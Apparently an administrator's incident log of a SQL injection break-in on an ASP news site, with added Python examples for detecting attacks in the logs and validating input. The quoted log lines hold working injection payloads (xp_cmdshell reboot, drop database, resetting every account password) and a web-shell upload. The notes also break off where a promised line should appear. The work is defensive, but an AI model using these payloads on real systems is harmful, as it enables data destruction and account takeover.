Time: 13:30
Received a call from the laboratory: users of the website information release system (old version) cannot log in. Every username and password has been changed to Admin; no other changes were found.
Analysis: the database was modified illegitimately. Because the username is the primary key, duplicate usernames cannot occur under normal conditions.
Time: 15:30
Went to the laboratory to look at the server. It runs Windows 2003 with IIS 6.0; the system is written in ASP and the database is SQL Server 2000. Restored the user table from a backup. Checked the system's security log and found the following records:

2004-09-08 03:32:20 GET /news/showmsg.asp ID=1190%20and%20exists(select%20*%20from%20Admin)|24|80040e37|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Invalid_object_name_'Admin'. 80 - 211.157.253.134 500

The system has a SQL injection vulnerability! The intruder is guessing the name of the user table. Looking up the operation records of 211.157.253.134 shows it had already been at this many times, and it keeps guessing:

2004-09-08 03:32:31 GET /news/showmsg.asp ID=1190%20and%20exists(select%20*%20from%20User)|24|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Incorrect_syntax_near_the_keyword_'User'. 80 - 211.157.253.134 500

Now the action starts. Reading on:

2004-09-08 03:33:58 GET /news/showmsg.asp ID=1190%20and%20exists(select%20*%20from%20News)|24|80040e37|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Invalid_object_name_'news'. 80 - 211.157.253.134 500

Several information tables are guessed at as well, with real persistence, but none is ever hit.

2004-09-08 03:36:01 GET /news/showmsg.asp ID=1190;exec%20xp_cmdshell%20'iisreset%20/reboot%20/now'|194|80004005|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Could_not_find_stored_procedure_'xp_cmdshell'. 80 - 211.157.253.134 500

ID=1190;exec%20dbo.master.xp_cmdshell%20'iisreset%20/reboot%20/now'|194|80004005|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Could_not_locate_entry_in_sysdatabases_for_database_'dbo'._No_entry_found_with_that_name._Make_sure_that_the_name_is_entered_correctly. 80 - 211.157.253.134 500

2004-09-08 03:37:33 GET /news/showmsg.asp ID=1190;exec%20master.xp_cmdshell%20'iisreset%20/reboot%20/now'|194|80004005|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Could_not_find_stored_procedure_'master.xp_cmdshell'. 80 - 211.157.253.134 500

Good. Some extended stored procedures had already been removed during earlier hardening.

A few more message tables are guessed at, again without success, and finally the real action begins:

2004-09-08 03:38:55 GET /news/showmsg.asp id=1190;select%20*%20from%20[user]; 80 - 211.157.253.134 200

2004-09-08 03:47:31 GET /news/showmsg.asp ID=1190%20and%20drop%20databases%20t***s|24|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Incorrect_syntax_near_the_keyword_'drop'. 80 - 211.157.253.134 500

Guessing the database name, and trying to drop the whole database. Sinister!

2004-09-08 03:47:46 GET /news/showmsg.asp ID=1190%20;%20drop%20database%20Trans;--|194|80004005|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Cannot_drop_the_database_'n***s'_because_it_is_currently_in_use. 80 - 211.157.253.134 500

In use, so it cannot be dropped...

2004-09-08 03:50:33 GET /news/showmsg.asp ID=1190%20;drop%20database%20master;|194|80004005|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Cannot_drop_the_database_'master'_because_it_is_a_system_database. 80 - 211.157.253.134 500

Even master is tried.

2004-09-08 03:56:18 GET /news/showmsg.asp ID=1190%20;insert%20into%20[user](username,[password])%20values('123123','123123'); 80 - 211.157.253.134 200

Creates a user.

2004-09-08 03:57:36 GET /news/showmsg.asp ID=1190%20;delete%20from%20[user]%20where%20username='123123';|24|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_';'. 80 - 211.157.253.134 500

Then deletes that user again. What was that for; was it of no use? Reading on:

2004-09-08 03:58:12 GET /news/showmsg.asp ID=1190%20;update%20[user]%20set%20username='admin',password='admin'%20where%20id=1;|24|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Invalid_column_name_'ID'. 80 - 211.157.253.134 500

Changing the administrator password, but the column name is wrong.

2004-09-08 03:58:43 GET /news/showmsg.asp ID=1190%20;update%20[user]%20set%20username='admin'; 80 - 211.157.253.134 200

2004-09-08 03:58:55 GET /news/showmsg.asp ID=1190%20;update%20[user]%20set%20[password]='admin'; 80 - 211.157.253.134 200

So this is how every username and password came to be changed.

2004-09-08 03:59:07 GET /news/msg_list.asp - 80 - 211.157.253.134 200

Already logged into the management interface. Whatever the goal was, there was at least some restraint: the database contents were left alone.

2004-09-08 04:01:56 GET /news/showmsg.asp ID=1190%20;drop%20database%20eaie;|194|80004005|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Cannot_drop_the_database_'eaie'_because_it_does_not_exist_in_the_system_catalog. 80 - 211.157.253.134 500

eaie???

2004-09-08 04:10:22 POST /news/saveupfile.asp - 80 - 211.157.253.134 200

Something was uploaded. Look:

2004-09-08 04:11:12 GET /news/upfile/200498121011admin1.asp - 80 - 211.157.253.134 200

An .asp file was uploaded using the admin login, and then executed.

2004-09-08 04:49:15 GET /news/upfile/200498121011admin1.asp path=c:/documents%20 - 211.157.253.134 200

Many similar operations followed; presumably a Trojan. Log analysis complete.

Time: 17:00
Looked at which files were uploaded. Opening one, a single line explains everything:
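Records like the ones above can be triaged automatically rather than read one by one. The following Python is an added example, not part of the original notes or of the information release system: it parses IIS 6 W3C lines in the layout quoted above (date, time, method, URI stem, query with any appended |line|errcode|message| ASP error, port, user, client IP, status), URL-decodes the query, names what the injected SQL attempts, and summarises per client IP. The sample records are constructed after the ones in the log; the field order, the category names and the regular expressions are this example's assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample modelled on the log records in the notes above. IIS 6 W3C
# field order assumed here: date time cs-method cs-uri-stem cs-uri-query s-port
# cs-username c-ip sc-status. IIS appends ASP error details to cs-uri-query as
# |line|errcode|message| with spaces in the message replaced by underscores.
SAMPLE_LOG = """\
2004-09-08 03:32:20 GET /news/showmsg.asp ID=1190%20and%20exists(select%20*%20from%20Admin)|24|80040e37|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Invalid_object_name_'Admin'. 80 - 211.157.253.134 500
2004-09-08 03:36:01 GET /news/showmsg.asp ID=1190;exec%20xp_cmdshell%20'iisreset%20/reboot%20/now'|194|80004005|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Could_not_find_stored_procedure_'xp_cmdshell'. 80 - 211.157.253.134 500
2004-09-08 03:38:55 GET /news/showmsg.asp id=1190;select%20*%20from%20[user]; 80 - 211.157.253.134 200
2004-09-08 03:47:46 GET /news/showmsg.asp ID=1190%20;%20drop%20database%20Trans;--|194|80004005|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Cannot_drop_the_database_'Trans'_because_it_is_currently_in_use. 80 - 211.157.253.134 500
2004-09-08 03:58:55 GET /news/showmsg.asp ID=1190%20;update%20[user]%20set%20[password]='admin'; 80 - 211.157.253.134 200
2004-09-08 03:59:07 GET /news/msg_list.asp - 80 - 211.157.253.134 200
2004-09-08 09:15:02 GET /news/showmsg.asp ID=1190 80 - 10.0.0.7 200
"""

# Ordered from most to least severe; the first match names the category.
RULES = [
    ("command_exec", re.compile(r"\bxp_cmdshell\b", re.I)),
    ("destructive", re.compile(r"\b(drop\s+(database|table)|delete\s+from|truncate\s+table)\b", re.I)),
    ("data_tamper", re.compile(r"\b(update\s+\S+\s+set|insert\s+into)\b", re.I)),
    ("recon", re.compile(r"\b(and|or)\s+exists\s*\(\s*select\b|\bselect\b.+\bfrom\b", re.I)),
]
# A second statement after ';' means the input reached the query as stacked SQL.
STACKED = re.compile(r";\s*(exec|select|drop|update|insert|delete)\b", re.I)


def parse_line(line):
    """Split one W3C record into fields; return None for comments or malformed lines."""
    parts = line.split()
    if line.startswith("#") or len(parts) != 9:
        return None
    date, time, method, stem, query, port, user, client_ip, status = parts
    sql_part, _, error_tail = query.partition("|")
    error_code = error_tail.split("|")[1] if error_tail.count("|") >= 2 else None
    return {
        "time": time, "method": method, "stem": stem, "client_ip": client_ip,
        "status": int(status), "query": unquote(sql_part), "error_code": error_code,
    }


def classify(query):
    """Name the first matching injection category, or None for a benign query."""
    for name, pattern in RULES:
        if pattern.search(query):
            return name
    return None


def triage(lines):
    """Return one finding per request whose query carries recognisable injected SQL."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        category = classify(rec["query"])
        if category is None:
            continue
        rec["category"] = category
        rec["stacked"] = bool(STACKED.search(rec["query"]))
        findings.append(rec)
    return findings


def summarize(findings):
    """Per client IP: flagged request count, categories seen, and how many stacked
    statements the server answered with 200 (the ones most likely to have succeeded)."""
    summary = {}
    for f in findings:
        s = summary.setdefault(f["client_ip"], {
            "requests": 0, "categories": set(), "successful_stacked": 0,
            "first": f["time"], "last": f["time"],
        })
        s["requests"] += 1
        s["categories"].add(f["category"])
        if f["stacked"] and f["status"] == 200:
            s["successful_stacked"] += 1
        s["first"] = min(s["first"], f["time"])
        s["last"] = max(s["last"], f["time"])
    return summary


if __name__ == "__main__":
    hits = triage(SAMPLE_LOG.splitlines())
    for h in hits:
        print(h["time"], h["client_ip"], h["status"], h["category"],
              "stacked" if h["stacked"] else "", h["error_code"] or "", h["query"])
    for ip, s in summarize(hits).items():
        print(ip, s)
```

The two signals worth acting on are the ones the notes themselves used: an ODBC error code appended to the query (80040e14, 80040e37) shows the application is echoing database errors, and a stacked statement answered with 200 is the request to treat as having succeeded. Run over the real log with `triage(open(path).readlines())`, the per-IP summary gives the first and last time of the session and whether any write went through.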
Time: 17:10
Checked the information release system's database connection file: it actually connects as sa. Added two new database users; the one used for displaying information is set to DataReader, so the user table cannot be operated on through it.
Time: 17:30
Reviewed the information release system's source code. SQL injection filtering is present, but string parameters have no corresponding restriction. Modified the source code to filter strictly.
Time: 18:00
Done.
Summary: Because of both the system's design and the server's management there were vulnerabilities: in the database, in the folder permission setup, and in uploads with no file-type restriction, which led to the website being injected. After remediation, security has improved. But intrusion still has to be shut out completely.
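The strict filtering above, and the upload type limit the log analysis showed was missing, come down to two allow-lists plus binding the parameter instead of concatenating it. The following is an added example, not the information release system's own code (which is classic ASP): it is written in Python with an in-memory SQLite database standing in for SQL Server 2000. The table names, the id format, the upload extension allow-list and the constructed inputs are this example's assumptions.

```python
import re
import sqlite3

# Allow-lists are assumptions for this example, not taken from the original system.
ID_RE = re.compile(r"^[1-9][0-9]{0,9}$")          # message ids: bare positive integers only
SAFE_NAME_RE = re.compile(r"^[A-Za-z0-9_\-]{1,64}\.[A-Za-z0-9]{1,5}$")  # one base name, one extension
ALLOWED_UPLOAD_EXT = {".jpg", ".jpeg", ".gif", ".png", ".txt", ".pdf"}  # never .asp or other executables


def validate_id(raw):
    """Return the message id as int, or None if the value is anything but a bare integer.
    '1190 and exists(...)' and '1190;update [user] ...' both fail here, before any SQL is built."""
    if raw is None:
        return None
    raw = raw.strip()
    return int(raw) if ID_RE.match(raw) else None


def validate_upload_name(name):
    """Allow-list check for uploaded file names: rejects executable extensions such as .asp,
    double extensions (shell.asp.jpg), path separators and anything outside [A-Za-z0-9_-]."""
    if not SAFE_NAME_RE.match(name):
        return False
    ext = name[name.rfind("."):].lower()
    return ext in ALLOWED_UPLOAD_EXT


def make_demo_db():
    """Constructed stand-in for the site's database: a news table and a users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table news (id integer primary key, title text)")
    conn.execute("create table users (username text primary key, password text)")
    conn.executemany("insert into news values (?, ?)", [(1190, "Lab notice"), (1191, "Schedule")])
    conn.execute("insert into users values ('admin', 'placeholder-hash')")
    conn.commit()
    return conn


def show_message(conn, raw_id):
    """The showmsg.asp lookup done safely: validated id, bound as a parameter, never concatenated."""
    msg_id = validate_id(raw_id)
    if msg_id is None:
        return None
    return conn.execute("select id, title from news where id = ?", (msg_id,)).fetchone()


def admin_password(conn):
    """Helper for checking that nothing routed through show_message touched the users table."""
    return conn.execute("select password from users where username = 'admin'").fetchone()[0]


if __name__ == "__main__":
    conn = make_demo_db()
    # Constructed inputs shaped like the ones in the log; all but the first are rejected before SQL.
    for raw in ("1190", "1190 and exists(select * from Admin)",
                "1190;update [user] set [password]='admin';", "1190 ; drop database master;"):
        print(repr(raw), "->", show_message(conn, raw))
    print("admin password still", admin_password(conn))
    for name in ("200498121011admin1.asp", "photo.JPG", "shell.asp.jpg", "../web.config"):
        print(name, "->", validate_upload_name(name))
```

The order matters: the allow-list runs on the raw request value first, so the query never sees anything but an integer, and the bound parameter is the second line of defence if a field is ever widened to free text. In the ASP original the same shape is an ADODB.Command with a typed parameter rather than a concatenated string, and the upload handler applying the extension check before writing under /news/upfile/.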